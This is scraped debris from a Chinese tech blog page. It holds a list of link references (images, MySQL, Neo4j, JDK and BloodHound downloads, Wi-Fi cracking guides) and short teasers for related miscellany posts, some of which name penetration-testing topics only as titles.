https://img-blog.csdnimg.cn/5099c27eb21340809fa393e197046b78.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [mariadb]: https://www.pianshen.com/article/1216870848/ [MySQL root]: https://www.cnblogs.com/ivictor/p/9243259.html [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 1]: https://img-blog.csdnimg.cn/f3c67502605e48a489a9e1dcbe00be60.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 2]: https://img-blog.csdnimg.cn/079b7378d62f48bb82fa6e9f397d85a8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 3]: https://img-blog.csdnimg.cn/aecee9dc17fa4d6292869e4af987f9ab.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_11_color_FFFFFF_t_70_g_se_x_16]: https://img-blog.csdnimg.cn/0c4c8640e18441f19b1dac2feb705ce0.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_11,color_FFFFFF,t_70,g_se,x_16 [macos_wifi]: http://wwdd23.github.io/macos-reaver/ [kali_wifi]: https://www.bbsmax.com/A/pRdB8n9PJn/ [https_neo4j.com_download-center_community]: https://neo4j.com/download-center/#community [https_www.oracle.com_java_technologies_javase_jdk11-archive-downloads.html]: https://www.oracle.com/java/technologies/javase/jdk11-archive-downloads.html [http_localhost_7474_browser]: http://localhost:7474/browser/ [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 4]: https://img-blog.csdnimg.cn/9d8b3aba07b3497398d37751ff9cafef.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [https_github.com_BloodHoundAD_BloodHound_releases]: https://github.com/BloodHoundAD/BloodHound/releases [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 5]: https://img-blog.csdnimg.cn/bf214aa0f6c54db8b6e8ec328ca9f703.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 6]: https://img-blog.csdnimg.cn/3b18fec53d23412789bc28c06dc2a089.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 7]: https://img-blog.csdnimg.cn/6ddb3e377f694f6a90627ecc4e4318ca.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16 [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_17_color_FFFFFF_t_70_g_se_x_16]: https://img-blog.csdnimg.cn/e677ebab1d804bbd8cca467e3b1bc7a5.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_17,color_FFFFFF,t_70,g_se,x_16 [bloodhound]: https://bloodhound.readthedocs.io/en/latest/installation/osx.html [watermark_type_ZHJvaWRzYW5zZmFsbGJhY2s_shadow_50_text_Q1NETiBAU2hhbmZlbmdsYW43_size_20_color_FFFFFF_t_70_g_se_x_16 8]: https://img-blog.csdnimg.cn/5b4dc1f6974043b19a71e0430b10056d.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAU2hhbmZlbmdsYW43,size_20,color_FFFFFF,t_70,g_se,x_16
相关 杂记---- 文章目录 1. echo命令特性 2. msf 3. 劫持explorer.exe黑屏 4. 影子账户 5. 烂土豆提权 6. mim 拼搏现实的明天。/ 2022年11月20日 08:20/ 0 赞/ 647 阅读
相关 杂记 杂记 MySQL相关 show variables like ‘%变量名%’查看mysql变量 select version查询mysql版本号 mysql 默 曾经终败给现在/ 2022年10月30日 14:22/ 0 赞/ 247 阅读
相关 杂记 Google镜像: [https://github.com/greatfire/wiki][https_github.com_greatfire_wiki] 谁借莪1个温暖的怀抱¢/ 2022年09月28日 13:24/ 0 赞/ 218 阅读
相关 杂记 人生,也是游戏,鼓起勇气玩这游戏。 看到额头的岁月痕迹,不禁心寒。从现在开始,要让自己开心,灵活巧妙的应对人生的挑战———— 序,先和后的关系。复杂的事情,如果掌握好序,其 柔情只为你懂/ 2022年06月01日 02:13/ 0 赞/ 194 阅读
相关 杂记 7月7日。 \-------------------------------------------------------------- 距离刚开始学爬虫,已经近一个 小灰灰/ 2022年05月21日 13:16/ 0 赞/ 207 阅读
相关 杂记 ![!\[blockchain\](https://ss0.bdstatic.com/70cFvHSh\_Q1YnxGkpoWK1HF6hhy/it/u=702257389,1 蔚落/ 2022年05月11日 13:44/ 0 赞/ 208 阅读
相关 杂记 @GET : 提供查询方法,所有参数均在URL路径中,只能传输一个或者多个字符串,无法传输对象 @POST:提供新增方法,参数可以存在URL路径 妖狐艹你老母/ 2022年04月17日 06:27/ 0 赞/ 226 阅读
相关 杂记 愿你三冬暖,愿你春不寒, 愿你天黑有灯,下雨有伞, 愿你一路上,有良人相伴。 愿有人陪你颠沛流离, 愿你惦念的人能和你道早安, 愿你独闯的日子里不觉得孤单。 愿孤单 た 入场券/ 2021年12月09日 02:27/ 0 赞/ 346 阅读
相关 杂记 1.@RequestMapping 和 @GetMapping @PostMapping 区别 @GetMapping是一个组合注解,是@RequestMapping(met 水深无声/ 2021年10月09日 10:08/ 0 赞/ 380 阅读
相关 杂记 神奇的数学(index=(0x80000000>>>前置0)^位置): ![734212-20190329100618019-44678809.jpg][] 一些收藏: 蔚落/ 2021年09月29日 10:14/ 0 赞/ 329 阅读
还没有评论,来说两句吧...